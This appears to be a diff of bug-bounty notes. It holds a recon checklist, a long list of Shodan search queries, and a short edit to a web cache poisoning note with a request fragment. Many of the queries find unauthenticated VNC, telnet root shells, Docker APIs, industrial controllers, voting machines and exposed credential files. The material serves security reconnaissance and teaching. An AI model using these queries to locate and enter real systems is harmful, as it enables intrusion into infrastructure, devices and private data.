- [x] Directory Enumeration
- [x] Hardcoded Information in JavaScript
- [x] GitHub Reconnaissance
- [x] Google Dorking
- [x] Data Breach Analysis
- [x] Parameter Fuzzing
- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
- [x] IP Range Enumeration (If in Scope)
- [x] Wayback History
- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
- [x] Heartbleed Scanning
- [x] General Security Misconfiguration Scanning
* ### __Large Scope__
Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.)
- [x] Subsidiary & Acquisition Enumeration (Depth Max)
- [x] Reverse Lookup
- [x] ASN & IP Space Enumeration and Service Identification
- [x] Subdomain Enumeration
- [x] Subdomain Takeover
- [x] Probing & Technology Fingerprinting
- [x] Port Scanning
- [x] Known Vulnerabilities
- [x] Template Based Scanning (Nuclei/Jeales)
- [x] Misconfigured Cloud Storage
- [x] Broken Link Hijacking
- [x] Directory Enumeration
- [x] Hardcoded Information in JavaScript
- [x] GitHub Reconnaissance
- [x] Google Dorking
- [x] Data Breach Analysis
- [x] Parameter Fuzzing
- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
- [x] IP Range Enumeration (If in Scope)
- [x] Wayback History
- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
- [x] Heartbleed Scanning
- [x] General Security Misconfiguration Scanning
- [x] And any possible Recon Vector (Network/Web) can be applied.
Source: [Link](https://www.xmind.net/m/hKKexj/)

763
Recon/Shodan Dorks.md Normal file
View File

@ -0,0 +1,763 @@
# Shodan Dorks
## Basic
### City:
Find devices in a particular city.
```
city:"Bangalore"
```
### Country:
Find devices in a particular country.
```
country:"IN"
```
### Geo:
Find devices by giving geographical coordinates.
```
geo:"56.913055,118.250862"
```
### Location
```
country:us
country:ru
city:chicago
country:ru country:de city:chicago
```
### Hostname:
Find devices matching the hostname.
```
server: "gws" hostname:"google"
hostname:example.com
hostname:example.com,example.org
```
### Net:
Find devices based on an IP address or /x CIDR.
```
net:210.214.0.0/16
```
### Organization
```
org:microsoft
org:"United States Department"
```
### Autonomous System Number (ASN)
```
asn:ASxxxx
```
### OS:
Find devices based on operating system.
```
os:"windows 7"
```
### Port:
Find devices based on open ports.
```
proftpd port:21
```
### Before/after:
Find devices before or after between a given time.
```
apache after:22/02/2009 before:14/3/2010
```
### SSL/TLS Certificates
- Self signed certificates
```
ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com
```
- Expired certificates
```
ssl.cert.expired:true
ssl.cert.subject.cn:example.com
```
### Device Type
```
device:firewall
device:router
device:wap
device:webcam
device:media
device:"broadband router"
device:pbx
device:printer
device:switch
device:storage
device:specialized
device:phone
device:"voip phone"
device:"voip adaptor"
device:"load balancer"
device:"print server"
device:terminal
device:remote
device:telecom
device:power
device:proxy
device:pda
device:bridge
```
### Operating System
```
os:"windows 7"
os:"windows server 2012"
os:"linux 3.x"
```
### Product
```
product:apache
product:nginx
product:android
product:chromecast
```
### Customer Premises Equipment (CPE)
```
cpe:apple
cpe:microsoft
cpe:nginx
cpe:cisco
```
### Server
```
server: nginx
server: apache
server: microsoft
server: cisco-ios
```
### ssh fingerprints
```
dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0
```
## Web
### Pulse Secure
```
http.html:/dana-na
```
### PEM Certificates
```
http.title:"Index of /" http.html:".pem"
```
## Databases
### MySQL
```
"product:MySQL"
```
### MongoDB
```
"product:MongoDB"
```
### elastic
```
port:9200 json
```
### Memcached
```
"product:Memcached"
```
### CouchDB
```
"product:CouchDB"
```
### PostgreSQL
```
"port:5432 PostgreSQL"
```
### Riak
```
"port:8087 Riak"
```
### Redis
```
"product:Redis"
```
### Cassandra
```
"product:Cassandra"
```
## Industrial Control Systems
### Samsung Electronic Billboards
```
"Server: Prismview Player"
```
### Gas Station Pump Controllers
```
"in-tank inventory" port:10001
```
### Fuel Pumps connected to internet:
No auth required to access CLI terminal.
```
"privileged command" GET
```
### Automatic License Plate Readers
```
P372 "ANPR enabled"
```
### Traffic Light Controllers / Red Light Cameras
```
mikrotik streetlight
```
### Voting Machines in the United States
```
"voter system serial" country:US
```
### Open ATM:
```
May allow for ATM Access availability
NCR Port:"161"
```
### Telcos Running Cisco Lawful Intercept Wiretaps
```
"Cisco IOS" "ADVIPSERVICESK9_LI-M"
```
### Prison Pay Phones
```
"[2J[H Encartele Confidential"
```
### Tesla PowerPack Charging Status
```
http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
```
### Electric Vehicle Chargers
```
"Server: gSOAP/2.8" "Content-Length: 583"
```
### Maritime Satellites
Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!
```
"Cobham SATCOM" OR ("Sailor" "VSAT")
```
### Submarine Mission Control Dashboards
```
title:"Slocum Fleet Mission Control"
```
### CAREL PlantVisor Refrigeration Units
```
"Server: CarelDataServer" "200 Document follows"
```
### Nordex Wind Turbine Farms
```
http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"
```
### C4 Max Commercial Vehicle GPS Trackers
```
"[1m[35mWelcome on console"
```
### DICOM Medical X-Ray Machines
Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.
```
"DICOM Server Response" port:104
```
### GaugeTech Electricity Meters
```
"Server: EIG Embedded Web Server" "200 Document follows"
```
### Siemens Industrial Automation
```
"Siemens, SIMATIC" port:161
```
### Siemens HVAC Controllers
```
"Server: Microsoft-WinCE" "Content-Length: 12581"
```
### Door / Lock Access Controllers
```
"HID VertX" port:4070
```
### Railroad Management
```
"log off" "select the appropriate"
```
### Tesla Powerpack charging Status:
Helps to find the charging status of tesla powerpack.
```
http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
```
### XZERES Wind Turbine
```
title:"xzeres wind"
```
### PIPS Automated License Plate Reader
```
"html:"PIPS Technology ALPR Processors""
```
### Modbus
```
"port:502"
```
### Niagara Fox
```
"port:1911,4911 product:Niagara"
```
### GE-SRTP
```
"port:18245,18246 product:"general electric""
```
### MELSEC-Q
```
"port:5006,5007 product:mitsubishi"
```
### CODESYS
```
"port:2455 operating system"
```
### S7
```
"port:102"
```
### BACnet
```
"port:47808"
```
### HART-IP
```
"port:5094 hart-ip"
```
### Omron FINS
```
"port:9600 response code"
```
### IEC 60870-5-104
```
"port:2404 asdu address"
```
### DNP3
```
"port:20000 source address"
```
### EtherNet/IP
```
"port:44818"
```
### PCWorx
```
"port:1962 PLC"
```
### Crimson v3.0
```
"port:789 product:"Red Lion Controls"
```
### ProConOS
```
"port:20547 PLC"
```
## Remote Desktop
### Unprotected VNC
```
"authentication disabled" port:5900,5901
"authentication disabled" "RFB 003.008"
```
### Windows RDP
99.99% are secured by a secondary Windows login screen.
```
"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"
```
## Network Infrastructure
### Hacked routers:
Routers which got compromised
```
hacked-router-help-sos
```
### Redis open instances
```
product:"Redis key-value store"
```
### Citrix:
Find Citrix Gateway.
```
title:"citrix gateway"
```
### Weave Scope Dashboards
Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.
```
title:"Weave Scope" http.favicon.hash:567176827
```
### MongoDB
Older versions were insecure by default. Very scary.
```
"MongoDB Server Information" port:27017 -authentication
```
### Mongo Express Web GUI
Like the infamous phpMyAdmin but for MongoDB.
```
"Set-Cookie: mongo-express=" "200 OK"
```
### Jenkins CI
```
"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
```
### Jenkins:
Jenkins Unrestricted Dashboard
```
x-jenkins 200
```
### Docker APIs
```
"Docker Containers:" port:2375
```
### Docker Private Registries
```
"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab
```
### Pi-hole Open DNS Servers
```
"dnsmasq-pi-hole" "Recursion: enabled"
```
### Already Logged-In as root via Telnet
```
"root@" port:23 -login -password -name -Session
```
### Telnet Access:
NO password required for telnet access.
```
port:23 console gateway
```
### Polycom video-conference system no-auth shell
```
"polycom command shell"
```
### NPort serial-to-eth / MoCA devices without password
```
nport -keyin port:23
```
### Android Root Bridges
A tangential result of Google's sloppy fractured update approach.
```
"Android Debug Bridge" "Device" port:5555
```
### Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords
```
Lantronix password port:30718 -secured
```
### Citrix Virtual Apps
```
"Citrix Applications:" port:1604
```
### Cisco Smart Install
Vulnerable (kind of "by design," but especially when exposed).
```
"smart install client active"
```
### PBX IP Phone Gateways
```
PBX "gateway console" -password port:23
```
### Polycom Video Conferencing
```
http.title:"- Polycom" "Server: lighttpd"
"Polycom Command Shell" -failed port:23
```
### Telnet Configuration:
```
"Polycom Command Shell" -failed port:23
```
### Bomgar Help Desk Portal
```
"Server: Bomgar" "200 OK"
```
### Intel Active Management CVE-2017-5689
```
"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995
”Active Management Technology”
```
### HP iLO 4 CVE-2017-12542
```
HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900
```
### Lantronix ethernet adapters admin interface without password
```
"Press Enter for Setup Mode port:9999"
```
### Wifi Passwords:
Helps to find the cleartext wifi passwords in Shodan.
```
html:"def_wirelesspassword"
```
### Misconfigured Wordpress Sites:
The wp-config.php if accessed can give out the database credentials.
```
http.html:"* The wp-config.php creation script uses this file"
```
## Outlook Web Access:
### Exchange 2007
```
"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"
```
### Exchange 2010
```
"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392
```
### Exchange 2013 / 2016
```
"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"
```
### Lync / Skype for Business
```
"X-MS-Server-Fqdn"
```
## Network Attached Storage (NAS)
### SMB (Samba) File Shares
Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.
```
"Authentication: disabled" port:445
```
### Specifically domain controllers:
```
"Authentication: disabled" NETLOGON SYSVOL -unix port:445
```
### Concerning default network shares of QuickBooks files:
```
"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445
```
### FTP Servers with Anonymous Login
```
"220" "230 Login successful." port:21
```
### Iomega / LenovoEMC NAS Drives
```
"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"
```
### Buffalo TeraStation NAS Drives
```
Redirecting sencha port:9000
```
### Logitech Media Servers
```
"Server: Logitech Media Server" "200 OK"
```
### Plex Media Servers
```
"X-Plex-Protocol" "200 OK" port:32400
```
### Tautulli / PlexPy Dashboards
```
"CherryPy/5.1.0" "/home"
```
### Home router attached USB
```
"IPC$ all storage devices"
```
## Webcams
### D-Link webcams
```
"d-Link Internet Camera, 200 OK"
```
### Hipcam
```
"Hipcam RealServer/V1.0"
```
### Yawcams
```
"Server: yawcam" "Mime-Type: text/html"
```
### webcamXP/webcam7
```
("webcam 7" OR "webcamXP") http.component:"mootools" -401
```
### Android IP Webcam Server
```
"Server: IP Webcam Server" "200 OK"
```
### Security DVRs
```
html:"DVR_H264 ActiveX"
```
### Surveillance Cams:
With username:admin and password: :P
```
NETSurveillance uc-httpd
Server: uc-httpd 1.0.0
```
## Printers & Copiers:
### HP Printers
```
"Serial Number:" "Built:" "Server: HP HTTP"
```
### Xerox Copiers/Printers
```
ssl:"Xerox Generic Root"
```
### Epson Printers
```
"SERVER: EPSON_Linux UPnP" "200 OK"
"Server: EPSON-HTTP" "200 OK"
```
### Canon Printers
```
"Server: KS_HTTP" "200 OK"
"Server: CANON HTTP Server"
```
## Home Devices
### Yamaha Stereos
```
"Server: AV_Receiver" "HTTP/1.1 406"
```
### Apple AirPlay Receivers
Apple TVs, HomePods, etc.
```
"\x08_airplay" port:5353
```
### Chromecasts / Smart TVs
```
"Chromecast:" port:8008
```
### Crestron Smart Home Controllers
```
"Model: PYNG-HUB"
```
## Random Stuff
### OctoPrint 3D Printer Controllers
```
title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944
```
### Etherium Miners
```
"ETH - Total speed"
```
### Apache Directory Listings
Substitute .pem with any extension or a filename like phpinfo.php.
```
http.title:"Index of /" http.html:".pem"
```
### Misconfigured WordPress
Exposed wp-config.php files containing database credentials.
```
http.html:"* The wp-config.php creation script uses this file"
```
### Too Many Minecraft Servers
```
"Minecraft Server" "protocol 340" port:25565
```
### Literally Everything in North Korea
```
net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24
```

View File

@ -1,4 +1,8 @@
# Web Cache Poisoning
## **Introduction**
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
## **How to Find**
1. Basic poisoning
```
GET / HTTP/1.1
@ -144,4 +148,7 @@ The response is
```
HTTP/1.1 302 Found
Location: http://noshandnibble.blog/
```
```
Reference:
- [Portswigger](https://portswigger.net/research/practical-web-cache-poisoning)